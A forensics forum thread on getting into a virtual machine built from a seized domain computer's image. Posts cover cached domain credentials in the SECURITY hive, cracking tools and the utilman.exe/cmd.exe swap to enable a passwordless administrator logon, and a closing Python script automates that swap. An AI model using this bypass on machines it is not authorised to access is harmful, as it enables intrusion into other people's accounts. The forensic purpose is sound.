reset passwords in domain computer virtual machine

(@twjolson)
Honorable Member
Joined: 17 years ago
Posts: 417
 

Because, even if you got your hands on the SAM file, it wouldn't contain the domain credentials. SAM stores local accounts only.

If you want domain credentials, that's in the Security hive file within the image. If he's looking for a specific credential, it may not be there. I think it only caches a limited number of domain logins. You guys are constructing Rube Goldberg solutions.

As for using the domain controller, I doubt that another domain computer's passwords would be stored there.

I do not know where the domain controller stores passwords for user accounts in the domain. I'd assume active directory, but I am unsure. It does not come up much.


(@n3o33)
New Member
Joined: 13 years ago
Posts: 2
 

I have created a virtual machine of a dd image using LiveView; however, I need to log into the virtual machine.

The image is from a domain computer

I have tried peter recovery disk but it was unsuccessful

Taurean25,

LiveView makes a Law Enforcement version that allows you to blank user names and passwords when you blow the image into a VM. If you have access to this application I would suggest using it, as it will probably prove to be the quickest solution, although the other suggestions could also prove successful but would likely require a significant amount of time for the rainbow tables to break the password. Just an idea.

~N


(@cults14)
Reputable Member
Joined: 17 years ago
Posts: 367
 

LiveView LE version - what about those of us not in LE? It isn't free, but has anyone used VFC2 which claims to be able to bypass Windows password requirements?

Cheers


(@cedricpernet)
Eminent Member
Joined: 16 years ago
Posts: 26
 

Did you try OpenGates?

http://www2.opensourceforensics.org/node/22


Chris_Ed
(@chris_ed)
Reputable Member
Joined: 16 years ago
Posts: 314
 

LiveView LE version - what about those of us not in LE? It isn't free, but has anyone used VFC2 which claims to be able to bypass Windows password requirements?

Cheers

You're correct - VFC2 enables you to do this and it's a very useful feature. If you come across a password-protected Windows volume, it is as simple as suspending the VM and running the relevant tool from VFC2. You can then log into any account with any password.

But as you say, it's not free.


(@taurean25)
Trusted Member
Joined: 15 years ago
Posts: 62
Topic starter  

Thanks for all your help everyone, the other issue that has not been mentioned is that if the suspect has EFS encrypted files, you will not be able to access those files using the VFC2 method or other password bypass methods mentioned. I believe all these methods mentioned change the password on the accounts.

If you need access to the EFS encrypted files, you will need to use a tool like PRTK or crack the hashes in the SECURITY HIVE if the passwords are hopefully cached there.


(@buddhika90d)
New Member
Joined: 13 years ago
Posts: 1
 

If the given tool does not work, try the following link:
windows xp password reset
I think you can reset your password.


tg92
(@tg92)
Active Member
Joined: 15 years ago
Posts: 13
 

Hi,

Correct me if I'm wrong...

There are two user types in Windows:

1/ local user

- Authentication is local; the user password is compared to the hash in the SAM file
- The password can easily be wiped or cracked with Offline NT Password & Registry Editor, Ophcrack, ...

2/ domain user

- Authentication is done by the domain controller (DC); the user password is compared to the hash in the "ntds.dit" file on the DC
- The password can be cracked if you have access to the DC
- But 1: if the domain is down, users can't log on to their domain accounts and the PC is useless... so Windows keeps a hash of the domain password in a cache location. These cached credentials are stored in the SECURITY hive (HKLM\Security\Cache).
Different tools can be used to try to crack these encrypted credentials: cachedump (http://www.securiteam.com/tools/5JP0I2KFPA.html), Network Password Recovery (http://www.passcape.com/domain_cached_passwords)
- But 2: a local account and a domain account can be present on the same machine, so you can try to crack the SAM file to log on to the local account and access local data (domain resources won't be accessible)... just remember to log on with an admin account :)
- But 3: if there isn't a local account, you can try to activate the default admin account this way:
-> boot from an Ubuntu live CD
-> rename utilman.exe to utilman.exe.old
-> rename cmd.exe to utilman.exe
-> boot the PC; at the login screen press "Windows" + "U"
-> type the command net user administrator /active:yes
-> reboot the system and log on with the "administrator" account without a password

That's how I see the problem. Please let me know if I'm wrong or if you have other ways/tools/remarks.

Thanks,

Thierry


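Thierry's "But 3" steps (the utilman.exe swap) as an added example, written in Python rather than the live-CD shell the post describes; it is not code from the thread. It assumes the NTFS volume is already mounted read-write (for example with ntfs-3g from a live CD) and takes the path of the volume's Windows\System32 directory as its argument. It differs from the post in one deliberate way: it copies cmd.exe over utilman.exe instead of renaming it, so cmd.exe stays in place and restore_utilman() can put the original back when the examination is done. Because Linux exposes NTFS names case-sensitively, the real spelling of Utilman.exe is looked up before anything is renamed, and a second run is refused so the backup is never clobbered. demo() exercises the whole thing against a constructed fake System32 in a temporary directory; the Win+U and "net user administrator /active:yes" steps remain manual on the booted VM.

```python
"""Stage the utilman.exe -> cmd.exe swap on an offline Windows volume, with a restore path.

Added example, not code from the thread. Assumes the Windows volume is mounted read-write
(e.g. ntfs-3g from a live CD) and that the caller passes its Windows/System32 directory.
After rebooting the VM the remaining steps are manual: Win+U at the logon screen opens the
planted cmd.exe, then `net user administrator /active:yes`.
"""
import os
import shutil
import tempfile
from typing import Optional


def find_name(directory: str, wanted: str) -> Optional[str]:
    """Case-insensitive lookup returning the actual on-disk spelling (NTFS via ntfs-3g is case-sensitive)."""
    for name in os.listdir(directory):
        if name.lower() == wanted.lower():
            return name
    return None


def stage_utilman_swap(system32: str) -> dict:
    """Back up utilman.exe as <name>.old and copy cmd.exe into its place.

    Refuses to run if a backup already exists so the original is never overwritten twice.
    Returns the names touched so they can go into the examiner's notes.
    """
    util = find_name(system32, "utilman.exe")
    cmd = find_name(system32, "cmd.exe")
    if util is None or cmd is None:
        raise FileNotFoundError("utilman.exe or cmd.exe missing: wrong directory or not a Windows volume?")
    if find_name(system32, "utilman.exe.old") is not None:
        raise RuntimeError("utilman.exe.old already present: swap already staged, refusing to clobber backup")
    backup = util + ".old"  # keeps the original spelling, e.g. Utilman.exe.old
    os.rename(os.path.join(system32, util), os.path.join(system32, backup))
    shutil.copy2(os.path.join(system32, cmd), os.path.join(system32, util))
    return {"original": util, "backup": backup, "source": cmd}


def restore_utilman(system32: str) -> bool:
    """Undo the swap: remove the planted copy and move the backup back under its original name."""
    backup = find_name(system32, "utilman.exe.old")
    if backup is None:
        return False
    original = backup[:-len(".old")]
    planted = find_name(system32, "utilman.exe")
    if planted is not None:
        os.remove(os.path.join(system32, planted))
    os.rename(os.path.join(system32, backup), os.path.join(system32, original))
    return True


def demo() -> dict:
    """Exercise swap and restore on a constructed fake System32 (stand-in bytes, not real binaries)."""
    with tempfile.TemporaryDirectory() as tmp:
        sys32 = os.path.join(tmp, "Windows", "System32")
        os.makedirs(sys32)
        with open(os.path.join(sys32, "Utilman.exe"), "wb") as fh:
            fh.write(b"UTILMAN")
        with open(os.path.join(sys32, "cmd.exe"), "wb") as fh:
            fh.write(b"CMD")

        staged = stage_utilman_swap(sys32)
        with open(os.path.join(sys32, "Utilman.exe"), "rb") as fh:
            after_swap = fh.read()
        try:
            stage_utilman_swap(sys32)
            second_run_refused = False
        except RuntimeError:
            second_run_refused = True

        restored = restore_utilman(sys32)
        with open(os.path.join(sys32, "Utilman.exe"), "rb") as fh:
            after_restore = fh.read()
        return {
            "staged": staged,
            "after_swap": after_swap,
            "second_run_refused": second_run_refused,
            "restored": restored,
            "after_restore": after_restore,
            "cmd_still_present": find_name(sys32, "cmd.exe") is not None,
            "backup_gone": find_name(sys32, "utilman.exe.old") is None,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Run it against a mounted image as `stage_utilman_swap("/mnt/win/Windows/System32")` (path assumed), boot the VM, and call `restore_utilman()` on the same path afterwards so the volume goes back to its original state. As Taurean25 notes earlier in the thread, none of this helps with EFS: logging on through a planted cmd.exe or a blanked password never reproduces the user's original password, and without it the EFS keys stay locked.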